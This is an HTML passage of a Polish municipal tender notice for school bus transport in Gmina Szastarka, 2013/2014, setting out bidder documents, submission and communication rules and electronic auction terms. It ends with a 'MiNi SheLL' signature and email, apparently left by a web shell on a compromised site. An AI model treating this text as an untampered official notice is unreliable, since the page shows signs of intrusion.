<p>-oświadczenie o spełnianiu przez wykonawcę  wymaganych warunków określonych art.22 ust.1 ustawy z dnia 29 stycznia 2004 roku-Prawo zamówień  publicznych  zał.nr 2-oświadczenie o zapoznaniu się ze stanem technicznym dróg, długością tras dowozu, czasem przejazdu pojazdów,
-aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia  w oparciu o art.24 ust.1 pkt.2 ustawy, wystawionego nie wcześniej niż  6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
-aktualną kserokopię koncesji na usługi transportowe, przewóz osób,
-wykazu wykonanych co najmniej dwóch  usług, o wartości min. 50.000 zł. brutto każda,a w przypadku  świadczeń  okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat  przed  upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli  okres  prowadzenia jest krótszy- w tym okresie, wraz z podaniem  ich wartości, przedmiotu, dat wykonania i podmiotów, na  rzecz których dostawy  lub usługi zostały  wykonane oraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane  należycie,
-wykaz co najmniej 3 osób, które posiadają uprawnienia do prowadzenia  autobusów, a także legitymują się co najmniej 3 - letnim stażem pracy   w charakterze kierowcy autobusu, oraz spełniają  wymagania określone  w przepisach Prawa o ruchu  drogowym
-wykaz co najmniej  3  autobusów    do wykonania przedmiotu zamówienia, typ pojazdu, rok produkcji, przebieg, ilość miejsc wraz z aktualnymi badaniami technicznymi. Zamawiający  w razie wątpliwości zastrzega sobie prawo wglądu w  dokumenty potwierdzające spełnianie niniejszego wymogu. Wykonawca może  wykazać  się własnością lub prawem do dysponowania pojazdami.
-oświadczenie o braku podstaw do wykluczenia zał.nr 3
Wykonawcy powołujący się przy wykazywaniu spełniania warunków udziału w postepowaniu na zasoby innych podmiotów, które będą  brały udział  w realizacji części zamówienia, przedkłada także  dokumenty dotyczące  podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt.III.4.2. 
inne dokumenty i informacje: 
1.pełnomocnictwo dla lidera podmiotów występujących wspólnie, pełnomocnictwo do reprezentowania wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba  osoby nie została wskazana do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Dokument pełnomocnictwa powinien zostać podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli.
2. wykonawca, który wylicytuje  najkorzystniejszą cenę, przed podpisaniem umowy przedłoży Zamawiającemu  pisemną ofertę  na przedmiot zamówienia, potwierdzającą wylicytowaną cenę usługi dowozu i odwozu uczniów . 
3. Do bezpośredniego kontaktowania się w Wykonawcami pod względem proceduralnym  zamawiający upoważnia Marię  Szwedo- tel.15 87 14 145, fax. 15 87 14 130,  e-mail szwedom3@wp.pl   Wnioski, oświadczenia, zawiadomienia, inne dokumenty i informacje składane przez Zamawiającego i Wykonawców oraz umowa w sprawie zamówienia publicznego stanowią załączniki do protokołu postępowania o udzielenie zamówienia.
Dokumenty wymagane w niniejszym ogłoszeniu muszą być przedstawione w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę tj. osobę y uprawnioną lub upełnomocnioną do reprezentowania. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty wymienione wyżej złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku spełnia lub nie spełnia. CENA. Wykonawca, który wygra licytację, złoży w postąpieniach najniższą cenę, zostanie z nim zawarta umowa na realizację przedmiotu zamówienia. Przed zawarciem umowy wykonawca  dostarczy do Zamawiającego ofertę  na wylicytowaną cenę, na podstawie opisu tras i szacunkowej  ilości uczniów, dostępnych na stronie www.gminaszastarka.pl bip przetargi. Przygotowany oferta  będzie stanowiła załącznik do umowy. PRZEKAZANIE WNIOSKU O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI 1.Wniosek ma być złożony w zamkniętej, zabezpieczonej kopercie kopertach. Nie jest dopuszczalne złożenie wniosku w formie elektronicznej. Za sposób zabezpieczenia kopert y odpowiada Wykonawca. 2. Koperta ma być zaadresowana na Zamawiającego i oznaczona WNIOSEK O DOPUSZCZENIE DO UDZIAŁU W  LICYTACJI ELEKTRONICZNEJ NA  DOWÓZ UCZNIÓW DO PLACÓWEK OŚWIATOWYCH NA TERENIE GMINY SZASTARKA W ROKU SZKOLNYM  2013/2014, nie otwierać przed komisyjnym otwarciem wniosków. 3.Ponadto koperta winna spełniać warunek uniemożliwiający odczytanie jej zawartości i oznaczona nazwą (firmą) i adresem. Wnioski złożone po terminie nie będą rozpatrywane. Wszystkie wnioski otrzymane po terminie składania zostaną zwrócone Wykonawcom po upływie ostatecznego terminu składania wniosków. OPIS SPOSOBU PRZYGOTOWANIA WNIOSKÓW 1. Wykonawca składa wypełniony wniosek o dopuszczenie do udziału w postępowaniu wg. wzoru załącznika nr 1 do ogłoszenia oraz dokumenty i załączniki wskazane w ogłoszeniu.2.Wniosek o dopuszczenie do udziału w postępowaniu oraz wszystkie załączniki w tym dokumenty i oświadczenia, mają być w całości sporządzone w języku polskim, ręcznie, na maszynie do pisania lub komputerze,w sposób czytelny oraz podpisany w sposób określony w opisie przez osoby uprawnione, podpisujące wniosek. Osoba uprawniona to osoba, która jest wymieniona w aktualnym odpisie z właściwego rejestru lub działająca z jej upoważnienia.3.Wszystkie dokumenty w złożonym wniosku muszą być opieczętowane pieczątką imienną i podpisane lub podpisane przez osoby uprawnione i opieczętowane pieczęciami firmowymi lub sporządzone na papierze firmowym i podpisane przez osoby uprawnione. 4.W przypadku podpisywania wniosku przez osobę nie wymienioną w aktualnym odpisie z właściwego rejestru, niezbędne jest we wniosku pełnomocnictwo dla osoby działającej w imieniu Wykonawcy w formie oryginału lub jego poświadczonej notarialnie kopii. Pełnomocnictwo w sposób jednoznaczny ma określać, do jakich czynności upoważniona jest osoba podpisująca wniosek o dopuszczenie do udziału w postępowaniu.5.W przypadku Wykonawców ubiegających się wspólnie konsorcjum o udzielenie zamówienia publicznego na podstawie art. 23 ust. 2 ustawy Pzp wynika obowiązek ustanowienia pełnomocnika do reprezentowania ich w prowadzonym postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jest przedłożenie we wniosku pełnomocnictwa w formie oryginału lub jego poświadczonej notarialnie kopii w celu ustalenia podmiotu uprawnionego do występowania w imieniu grupy Wykonawców w sposób umożliwiający identyfikację Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Uwaga w przypadku spółki cywilnej, wspólnicy nie przedstawiają osobnego dokumentu zawierającego pełnomocnictwo, jednakże uprawnienia do reprezentacji spółki przysługujące każdemu ze wspólników ma wynikać z samej umowy spółki cywilnej dołączonej do wniosku.6.Wszelkie miejsca, w których Wykonawca naniósł poprawki, zmiany muszą być parafowane przez osobę podpisującą wniosek, osobę uprawnioną. 7.Wszelkie dokumenty składane na papierze światłoczułym uznane zostaną za nieważne.8.Wnioski o dopuszczenie do udziału w postępowaniu są jawne od dnia poinformowania o wynikach oceny spełniania warunków udziału w postępowaniu art. 96 ust 3,tj. zaproszenia do udziału w licytacji. Nie ujawnia się informacji umożliwiających identyfikację Wykonawcy podczas licytacji (login) aż do momentu jej zamknięcia oraz informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania wniosku zastrzegł, że nie mogą być one udostępniane. 9. Jeżeli Wykonawca chce zastrzec strony ww. wniosku wówczas składa je w dodatkowej zabezpieczonej kopercie, z opisem INFORMACJE STANOWIĄCE TAJEMNICĘ PRZEDSIĘBIORSTWA.10.Podmiot prowadzący działalność gospodarczą jako osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca osobowości prawnej, może złożyć tylko jeden wniosek o dopuszczenie do udziału w postępowaniu, sam lub jako Partner Konsorcjum firm. INFORMACJA O FORMALNOŚCIACH, JAKIE POWINNY ZOSTAĆ DOPEŁNIONE PO PRZEPROWADZENIU LICYTACJI W CELU ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO.1.błędnie podane dane w ofercie, w tym niezgodność z zakresem rzeczowym podanym w ogłoszeniu, np. ilość uczniów objętych dowożenie, km, niezgodność  rachunkowa,  będzie skutkowało wezwaniem Wykonawcy do przedłożenia prawidłowo  wypełnionej oferty. Wykonawca zobowiązany jest najpóźniej w dniu podpisania umowy do przedłożenia uchwały wspólników lub odpisu umowy spółki wyrażającej zgodę na zaciągnięcie zobowiązania,art. 230 Kodeksu Spółek Handlowych. Powyższe dotyczy również Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego.4.W przypadku wygrania licytacji przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego przed podpisaniem umowy konieczne jest przedłożenie umowy konsorcjum, która będzie regulować wzajemną współpracę Wykonawców czyli zawierać postanowienia dotyczące m.in. realizacji poszczególnych części zamówienia, sposobu dokonywania rozliczeń. Zgodnie z treścią art. 141 ustawy Pzp Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. Zasady solidarnej  odpowiedzialności zostały uregulowane art. 366 § 1 Kodeksu cywilnego. Umowa regulująca współpracę podmiotów występujących wspólnie konsorcjum ma m.in. upoważniać jednego z członków konsorcjum, Głównego Partnera, jako osobę prawną i reprezentującą go wskazaną osobę fizyczną, do występowania w imieniu każdego z pozostałych Partnerów we wszystkich sprawach związanych z umową, stwierdzać, że Partnerzy będą odpowiedzialni solidarnie za całość podjętych zobowiązań w ramach realizacji zamówienia, być zawarta na czas trwania umowy, aż do ostatecznego wygaśnięcia obowiązków i praw wobec zamawiającego, być zawarta w formie pisemnej, określać zakres rzeczowo-finansowy każdego z członków konsorcjum INFORMACJE O SPOSOBIE POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO 
Z WYKONAWCAMI WRAZ ZE WSKAZANIEM PRZEZ ZAMAWIAJĄCEGO OSÓB UPRAWNIONYCH DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI.1.Wszelkie oświadczenia, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie do momentu otwarcia licytacji. Oświadczenia, zawiadomienia oraz informacje przekazane za pomocą faxu,na pismie lub drogą elektroniczną uważa się za złożone w terminie, jeżeli ich treść dotarła do adresata przed upływem terminu i została niezwłocznie potwierdzona na piśmie doręczone pocztą lub osobiście na adres GMINA SZASTARKA, 23-225 SZASTARKA TEL.15 87 14 145, FAX.15 87 14 130,e-mail szwedom3@wp.pl  art. 27 ustawy Prawo Zamówień Publicznych. 2. Wykonawcy zobowiązani są do wskazania we wniosku o dopuszczenie do udziału w postępowaniu stanowiącym załącznik nr 1 do ogłoszenia numeru telefonu oraz numeru faksu lub adresu poczty elektronicznej, na który Zamawiający będzie przesyłał Wykonawcy wszelkie pisma przekazywane w ramach postępowania. Wykonawca wybiera faks albo pocztę elektroniczną według własnego uznania. W przypadku wpisania przez Wykonawcę zarówno numeru faksu jak i adresu poczty elektronicznej Zamawiający będzie przesyłał dokumenty pocztą elektroniczną. W przypadku wyboru przez Wykonawcę poczty elektronicznej Wykonawca ponosi pełną odpowiedzialność za odbieranie przekazywanej poczty. W przypadku zaniechania odebrania przekazanej poczty Wykonawca ponosi wszelkie wynikające z tego skutki.Zamawiający wymaga potwierdzenia otrzymania przekazywanego pisma drogą elektroniczną. W przypadku wyboru przez Wykonawcę jako drogi otrzymywania pism nadawanych przez Zamawiającego drogą faksową Wykonawca ponosi odpowiedzialność za sprawdzenie kompletności i czytelności otrzymania przesłanego pisma. Brak kompletności lub czytelności Wykonawca niezwłocznie zgłasza Zamawiającemu telefonicznie na nr 15 87 14 145 wew. 207. Za dowód skutecznego przesłania pisma do Wykonawcy drogą faksową Zamawiający uznaje potwierdzenie przesłania faksowego OK na numer podany przez Wykonawcę, na wniosku o dopuszczenie do udziału w licytacji elektronicznej . Zamawiający wymaga potwierdzenia otrzymania przekazywanego pisma drogą faksową,e-mail szwedom3@wp.pl.Wykonawca zobowiązany jest do powiadomienia Zamawiającego w przypadku zmiany numeru telefonu, faksu lub adresu poczty elektronicznej, na który Zamawiający ma przesyłać pisma. W przypadku nie dokonania powiadomienia Zamawiającego, przesłanie pisma na numer faksu lub adres poczty elektronicznej wskazany na wniosku zgodnie z zasadami wskazanymi w niniejszym punkcie uważa się za skutecznie dokonane. Zaproszenia do udziału w licytacji zostaną przekazane na wskazane adresy e-mail Wykonawców, a Wykonawca ma obowiązek potwierdzić Zamawiającemu fakt otrzymania zaproszenia. 3. Przesyłanie wszelkich informacji, oświadczeń, zaświadczeń drogą faksową i elektroniczną może odbywać się tylko w dniach pracy urzędu Zamawiającego,od poniedziałku do piątku w godzinach 08,00 do 15,00 na numer 15 87 14 130 lub e mail szwedom3@wp.pl. UWAGA W przypadku przesłania dokumentu po godzinie 15,00 w dniu roboczym spowoduje, iż zostanie on zarejestrowany u Zamawiającego jako złożony w następnym dniu roboczym. W przypadku przesłania dokumentu w dniu wolnym od pracy zostanie on zarejestrowany u Zamawiającego jako złożony w pierwszym następującym dniu roboczym. 4.Od momentu otwarcia do momentu zamknięcia licytacji Zamawiający i Wykonawcy wszelkiego rodzaju wnioski, oświadczenia i inne informacje przekazują drogą elektroniczną za pośrednictwem platformy licytacyjnej, wiadomości przekazywane Wykonawcom będą widoczne w zakładce moje wiadomości POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY W TOKU POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA. Wykonawcy w toku postępowania o udzielenie zamówienia przysługują środki ochrony prawnej określone w dziale VI ustawy Prawo Zamówień Publicznych. Zamawiającym jest Gminny Zespół Obsługi Placówek Oświatowych w Szastarce,23-225 Szastarka, woj. lubelskie, tel. 15 873 42 12, jak również będzie zawierał umowę na realizację przedmiotu zamówienia ze zwycięzcą licytacji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla stron postanowienia umowy zawarte są w  załączniku  do niniejszego ogłoszenia, zamieszczonym na stronie internetowej Zamawiającego www.gminaszastarka.pl/bip/                                 w zakładce przetargi, a mianowicie
W związku z art. 144 ustawy Pzp Zamawiający przewiduje możliwość zmiany istotnych postanowień umowy w stosunku do treści oferty, gdy :
1.Nastąpią zmiany ustawowe przepisów podatkowych.
2.Zajdzie zmiana w poszczególnych miesiącach w ilości przewożonych uczniów a także miejsca uczęszczania do poszczególnych szkół.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 15 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.gminaszastarka.pl/bip/przetargi</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wykonawcy
dopuszczeni do udziału w licytacji elektronicznej zostaną zaproszeni do składania ofert a ich dane zostaną przesłane do Urzędu Zamówień Publicznych na platformę do prowadzenia licytacji elektronicznych znajdującą się pod adresem http://licytacje.uzp.gov.pl Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się w systemie jako
Wykonawca. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do udziału w licytacji, winien zarejestrować się w tym systemie przed wysłaniem wniosku o dopuszczenie do udziału w licytacji, a wraz z powyższym wnioskiem winien przekazać Zamawiającemu informację o swoim loginie (identyfikatorze). Pomoc w sposobie rejestracji i odpowiedzi na ewentualne problemy znajdują się w Menu na głównej stronie platformy licytacji w zakładce - Samouczek. Wymagania techniczne - komputer klasy PC (lub równoważny) z systemem Windows lub Linux podłączony do sieci Internet, - zainstalowana przeglądarka: MS Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub wyższej..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto na sprawowanie kompleksowego nadzoru, 2. W toku licytacji elektronicznej Wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia. 3.Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 4. W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach, grosze należy oddzielić od złotych kropką,  5. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 6.Zamawiajacy przyjął  minimalne  postąpienie (minimalna różnica między kolejnymi ofertami-postąpieniami) wartość  5.500 zł brutto. 7. Licytacja elektroniczna rozpoczyna się od ceny wywoławczej   62 000.00zł brutto.  8. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym, że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 120 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 09.08.2013 godzina 09:00, miejsce: sekretariat - pokój nr.14  Urzędu Gminy w Szastarce.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Otwarcie licytacji elektronicznej nastąpi nie  wcześniej niż 5  dni od dnia przekazania zaproszenia do udziału w licytacji, o godz. 09:00. Dokładny dzień i godzina zostaną podane w zaproszeniu..</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Licytacja elektroniczna na  Dowóz uczniów do placówek oświatowych na terenie Gminy Szastarka w roku szkolnym 2013/2014  będzie licytacją jednoetapową i zakończy się po upływie 120  minut od momentu jej otwarcia.</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy, które służyć będzie pokryciu roszczeń z tytułu niewykonania lub nienależytego umowy.2.Od wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie przed podpisaniem umowy zabezpieczenia należytego wykonania umowy w wysokości 10  % ceny ofertowej przedstawionej przez Wykonawcę.
3.Zabezpieczenie należytego wykonania umowy wnoszone jest w jednej lub kilku następujących formach, w pieniądzu, przelewem na rachunek bankowy zamawiającego-w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym-w gwarancjach bankowych- w gwarancjach ubezpieczeniowych-w poręczeniach udzielanych przez podmioty,o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r.o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Istotne dla stron postanowienia umowy zawarte są w  załączniku  do ogłoszenia, zamieszczonym na stronie internetowej Zamawiającego www.gminaszastarka.pl/bip/                               w zakładce przetargi, m.in. W związku z art. 144 ustawy Pzp Zamawiający przewiduje możliwość zmiany istotnych postanowień umowy w stosunku do treści oferty, gdy :
1.Nastąpią zmiany ustawowe przepisów podatkowych.
2.Zajdzie zmiana w poszczególnych miesiącach w ilości przewożonych uczniów a także miejsca uczęszczania do poszczególnych szkół.</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com